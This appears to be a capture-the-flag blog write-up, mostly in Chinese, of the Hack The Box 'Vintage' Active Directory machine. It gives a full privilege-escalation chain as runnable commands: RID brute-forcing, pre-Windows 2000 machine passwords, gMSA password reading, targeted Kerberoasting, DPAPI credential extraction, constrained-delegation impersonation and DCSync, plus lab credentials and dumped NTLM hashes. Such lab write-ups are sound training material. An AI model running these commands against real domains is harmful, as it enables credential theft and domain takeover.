Zumpyx Blog

Vintage

Machines#637HardWindows

Tags: Kerberos、Rid-brute、Pre-Windows_2000、Kerberoastring、BloodHound、AS-REP_Roasting、GMSA、密码喷射、DPAPI、KCD

As is common in real life Windows pentests, you will start the Vintage box with credentials for the following 
account: P.Rosa / Rosaisbest123

Recon & Enum

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-02 01:52:56Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: vintage.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49683/tcp open  msrpc         Microsoft Windows RPC
50355/tcp open  msrpc         Microsoft Windows RPC
50376/tcp open  msrpc         Microsoft Windows RPC
sudo timedatectl set-ntp no
sudo rdate -n vintage.htb
impacket-getTGT 'vintage.htb'/'P.Rosa':'Rosaisbest123' -dc-ip $IP
netexec smb dc01.vintage.htb -d vintage.htb -k --rid-brute 10000

image-20241202163941538.png

Administrator
Guest
krbtgt
DC01$
gMSA01$
FS01$
M.Rossi
R.Verdi
L.Bianchi
G.Viola
C.Neri
P.Rosa
svc_sql
svc_ldap
svc_ark
C.Neri_adm
L.Bianchi_adm
impacket-getTGT vintage.htb/P.Rosa:Rosaisbest123 -dc-ip $IP
export KRB5CCNAME=P.Rosa.ccache
impacket-GetUserSPNs vintage.htb/ -usersfile info/user.list -request -dc-ip $IP -k -no-pass -outputfile info/spn.hash
SMB 枚举出一些$结尾的用户,当一个新的机器账户被配置成 "pre-Windows 2000 computer" 时,它的密码会被设置成小写用户名去掉$符号。那么针对三个账户进行测试
DC01$:dc01
gMSA01$:gmsa01
FS01$:fs01

https://medium.com/@offsecdeer/finding-weak-ad-computer-passwords-e3dc1ed220df https://github.com/garrettfoster13/pre2k

image-20241202170548278.png

impacket-getTGT vintage.htb/'FS01$':fs01 -dc-ip $IP
bloodhound-python -d vintage.htb -ns $IP -u P.Rosa -p Rosaisbest123 -c All --zip

image-20241203153141389.png

PRE-WINDOWS 2000 COMPATIBLE ACCESS 兼容组在 AUTHENTICATED USERS 组中,有权限读取所有对象的所有属性。

Shell as C.Neri

image-20241203161711643.png

impacket-getTGT vintage.htb/'FS01$':fs01 -dc-ip $IP
KRB5CCNAME=FS01\$.ccache bloodyAD --host dc01.vintage.htb -d vintage.htb -k get object 'GMSA01$' --attr msDS-ManagedPassword

distinguishedName: CN=gMSA01,CN=Managed Service Accounts,DC=vintage,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:a317f224b45046c1446372c4dc06ae53
msDS-ManagedPassword.B64ENCODED: rbqGzqVFdvxykdQOfIBbURV60BZIq0uuTGQhrt7I1TyP2RA/oEHtUj9GrQGAFahc5XjLHb9RimLD5YXWsF5OiNgZ5SeBM+WrdQIkQPsnm/wZa/GKMx+m6zYXNknGo8teRnCxCinuh22f0Hi6pwpoycKKBWtXin4n8WQXF7gDyGG6l23O9mrmJCFNlGyQ2+75Z1C6DD0jp29nn6WoDq3nhWhv9BdZRkQ7nOkxDU0bFOOKYnSXWMM7SkaXA9S3TQPz86bV9BwYmB/6EfGJd2eHp5wijyIFG4/A+n7iHBfVFcZDN3LhvTKcnnBy5nihhtrMsYh2UMSSN9KEAVQBOAw12g==

image-20241203162155881.png

GMSA01$ 可以将自己添加到 SERVICEMANAGERS 组中,然后可以完全控制 SVC_ARK、SVC_LDAP、SVC_SQL 三个用户

impacket-getTGT vintage.htb/'GMSA01$' -hashes ':a317f224b45046c1446372c4dc06ae53' -no-pass -dc-ip $IP
export KRB5CCNAME=GMSA01\$.ccache
bloodyAD --host dc01.vintage.htb -d vintage.htb -k add groupMember 'SERVICEMANAGERS' 'GMSA01$'
impacket-getTGT vintage.htb/'GMSA01$' -hashes ':a317f224b45046c1446372c4dc06ae53' -no-pass -dc-ip $IP

image-20241203163335258.png

但是这三个用户没啥特殊权限,因此先不要修改密码,先把密码导出一下,

这里第一次把密码改了,后面还好有花师傅指点,不然真迷路了。

https://github.com/ShutdownRepo/targetedKerberoast/blob/main/targetedKerberoast.py

现在对 SVC_* 用户有 GenericAll 权限,因此可以先尝试设置一个 SPN,然后再 Kerberoast,这个 py 脚本可以自动操作

targetedKerberoast --dc-ip $IP -d vintage.htb --dc-host dc01.vintage.htb -k

image-20241203223244299.png

但是这里很奇怪,只出了两个用户的 TGS,还有 SVC_SQL 的没显示,正常应该是都可以。

image-20241203225259105.png

bloodyAD --host dc01.vintage.htb -d vintage.htb -k remove uac 'svc_sql' -f ACCOUNTDISABLE

image-20241203230121016.png

image-20241203230128029.png

这样就可以成功拿到 svc_sql 的 tgs 了,可以把三个放一起跑 hashcat -m 13100

image-20241203230256415.png

密码喷射一下

image-20241203230416349.png

KRB5CCNAME=C.Neri.ccache evil-winrm -i 'dc01.vintage.htb' -r 'vintage.htb'

image-20241203231211751.png

Local Enum

image-20241205102341519.png

想跑一下 WinPEAS,但是靶机设置了 AMSI,因为太菜绕不过去,只能手动枚举一下了

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#dpapi

Get-ChildItem -force C:\Users\C.Neri\AppData\Local\Microsoft\Credentials\
Get-ChildItem -force C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials\

image-20241205105751998.png

Get-ChildItem -force -recurse C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -force -recurse C:\Users\C.Neri\AppData\Local\Microsoft\Protect\

image-20241205102138493.png

Shell as C.Neri_Adm

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords

这里枚举到了 DPAPI,可以根据 hacktricks 进一步测试,这里有 amsi,所以最好把凭据保存到本地

[System.Convert]::ToBase64String((Get-Content -Path 'C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\4dbf04d8-529b-4b4c-b4ae-8e875e4fe847' -Encoding Byte))

[System.Convert]::ToBase64String((Get-Content -Path 'C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b' -Encoding Byte))

[System.Convert]::ToBase64String((Get-Content -Path 'C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials\C4BB96844A5C9DD45D5B6A9859252BA6' -Encoding Byte))

[System.Convert]::ToBase64String((Get-Content -Path 'C:\Users\C.Neri\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D' -Encoding Byte))

image-20241205104022305.png

image-20241205105927361.png

因为有 amsi,用 evil-winrm download 老是出错,所以使用 base64 传输,开始解密

image-20241205110643646.png

image-20241205110806383.png

可以看到这个路径 C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\S-1-5-21-4024337825-2033394866-2055507597-1115\99cf41a3-a552-4cf7-a8d7-aca2d6f7339b 的 Key 是正确的,解密得到了新的用户凭据 vintage\C.Neri_Adm:Uncr4ck4bl3P4ssW0rd0312 验证一下

impacket-getTGT vintage.htb/'C.Neri_Adm:Uncr4ck4bl3P4ssW0rd0312' -dc-ip $IP

image-20241205111454023.png

Shell as Administrator

image-20241205113329251.png

bloodyAD --host dc01.vintage.htb -d vintage.htb -k add groupMember 'DELEGATEDADMINS' 'C.Neri_Adm'

image-20241205142917912.png

这里添加 C.Neri_Adm 失败,是因为 C.Neri_Adm 已经在组里面了

image-20241205232654174.png

image-20241205232838967.png

这里的 KCD 需要两个条件:

  1. 至少有一个 SPN,或者 sAMAccountName 以 $ 结尾

  2. msDS-AllowedToActOnBehalfOfOtherIdentity 属性(加入到 DELEGATEDADMINS 组)

这里 C.Neri_Adm 不能给自己加 SPN,所以需要换一个有权限控制的账户,前面出现 SVC_* 账户都可以控制,这里以 SVC_ARK 操作

# 0. 重启环境后发现不做这些不行
impacket-getTGT vintage.htb/'FS01$':fs01 -dc-ip $IP
KRB5CCNAME=FS01\$.ccache bloodyAD --host dc01.vintage.htb -d vintage.htb -k get object 'GMSA01$' --attr msDS-ManagedPassword

# 1. 获取 GMSA01$ 服务的票据,把自己添加到 SERVICEMANAGER 组中,然后重新获取票据
impacket-getTGT vintage.htb/'GMSA01$' -hashes ':a317f224b45046c1446372c4dc06ae53' -no-pass -dc-ip $IP
KRB5CCNAME=GMSA01\$.ccache bloodyAD --host dc01.vintage.htb -d vintage.htb -k add groupMember 'SERVICEMANAGERS' 'GMSA01$'
impacket-getTGT vintage.htb/'GMSA01$' -hashes ':a317f224b45046c1446372c4dc06ae53' -no-pass -dc-ip $IP

# 2. 使用 GMSA01$ 修改 SVC_Ark 的密码并添加 SPN,然后获取票据
KRB5CCNAME=GMSA01\$.ccache bloodyAD --host dc01.vintage.htb -d vintage.htb -k set password 'SVC_Ark' 'Admin@123'
KRB5CCNAME=GMSA01\$.ccache bloodyAD --host dc01.vintage.htb -d vintage.htb -k set object "SVC_Ark" servicePrincipalName -v "Fuck/You"
impacket-getTGT 'vintage.htb/SVC_Ark:Admin@123' -dc-ip $IP

# 3. 获取 C.Neri_Adm 票据,把 SVC_ARK 添加到 DELEGATEDADMINS 组
impacket-getTGT vintage.htb/'C.Neri_Adm:Uncr4ck4bl3P4ssW0rd0312' -dc-ip $IP
KRB5CCNAME=C.Neri_Adm.ccache bloodyAD --host dc01.vintage.htb -d vintage.htb -k add groupMember 'DELEGATEDADMINS' 'SVC_Ark'

# 4. KCD SVC_Ark 到 L.BIANCHI_ADM。L.BIANCHI_ADM 是另一个域管,Adm DCSync 会失败
impacket-getTGT 'vintage.htb/SVC_Ark:Admin@123' -dc-ip $IP
KRB5CCNAME=SVC_Ark.ccache impacket-getST -spn 'cifs/dc01.vintage.htb' -impersonate 'L.BIANCHI_ADM' 'vintage.htb/SVC_Ark:Admin@123' -dc-ip $IP -k

# 5. Dump Hash
KRB5CCNAME=L.BIANCHI_ADM@[email protected] impacket-secretsdump 'vintage.htb/[email protected]' -dc-ip $IP -k -no-pass -just-dc-ntlm

image-20241206002528263.png

成功获取到 L.BIANCHI_ADM 的票据,拿去 DCSync

image-20241206002438333.png

image-20241206002137293.png

More

Dump Hash

impacket-getTGT vintage.htb/L.Bianchi_adm -hashes ':75d93b5d1c67135a2c2f4979fb8d076f' -no-pass -dc-ip $IP
KRB5CCNAME=L.Bianchi_adm.ccache impacket-secretsdump 'vintage.htb/[email protected]' -dc-ip $IP -k -no-pass -just-dc-ntlm
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:468c7497513f8243b59980f2240a10de:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:be3d376d906753c7373b15ac460724d8:::
M.Rossi:1111:aad3b435b51404eeaad3b435b51404ee:8e5fc7685b7ae019a516c2515bbd310d:::
R.Verdi:1112:aad3b435b51404eeaad3b435b51404ee:42232fb11274c292ed84dcbcc200db57:::
L.Bianchi:1113:aad3b435b51404eeaad3b435b51404ee:de9f0e05b3eaa440b2842b8fe3449545:::
G.Viola:1114:aad3b435b51404eeaad3b435b51404ee:1d1c5d252941e889d2f3afdd7e0b53bf:::
C.Neri:1115:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
P.Rosa:1116:aad3b435b51404eeaad3b435b51404ee:8c241d5fe65f801b408c96776b38fba2:::
svc_sql:1134:aad3b435b51404eeaad3b435b51404ee:cc5156663cd522d5fa1931f6684af639:::
svc_ldap:1135:aad3b435b51404eeaad3b435b51404ee:458fd9b330df2eff17c42198627169aa:::
svc_ark:1136:aad3b435b51404eeaad3b435b51404ee:570a9a65db8fba761c1008a51d4c95ab:::
C.Neri_adm:1140:aad3b435b51404eeaad3b435b51404ee:91c4418311c6e34bd2e9a3bda5e96594:::
L.Bianchi_adm:1141:aad3b435b51404eeaad3b435b51404ee:75d93b5d1c67135a2c2f4979fb8d076f:::
DC01$:1002:aad3b435b51404eeaad3b435b51404ee:2dc5282ca43835331648e7e0bd41f2d5:::
gMSA01$:1107:aad3b435b51404eeaad3b435b51404ee:a317f224b45046c1446372c4dc06ae53:::
FS01$:1108:aad3b435b51404eeaad3b435b51404ee:44a59c02ec44a90366ad1d0f8a781274:::
[*] Cleaning up...

SVC_* Hash

前面使用的是 Kerberoasting 获取的 TGS Hash,这里也可以通过关闭预认证,来获取 AS-REP Hash

# 1. 启用 SVC_SQL
KRB5CCNAME=GMSA01\$.ccache bloodyAD --host dc01.vintage.htb -d vintage.htb -k remove uac 'svc_sql' -f ACCOUNTDISABLE
# 2. 关闭预认证
KRB5CCNAME=GMSA01\$.ccache bloodyAD --host dc01.vintage.htb -d vintage.htb -k add uac SVC_Ark -f DONT_REQ_PREAUTH
KRB5CCNAME=GMSA01\$.ccache bloodyAD --host dc01.vintage.htb -d vintage.htb -k add uac SVC_SQL -f DONT_REQ_PREAUTH
KRB5CCNAME=GMSA01\$.ccache bloodyAD --host dc01.vintage.htb -d vintage.htb -k add uac SVC_LDAP -f DONT_REQ_PREAUTH
# 3. GetNPU
impacket-GetNPUsers vintage.htb/ -usersfile info/user_svc.list -request

image-20241206094402216.png

可以拿到三个用户的 AS-REP Hash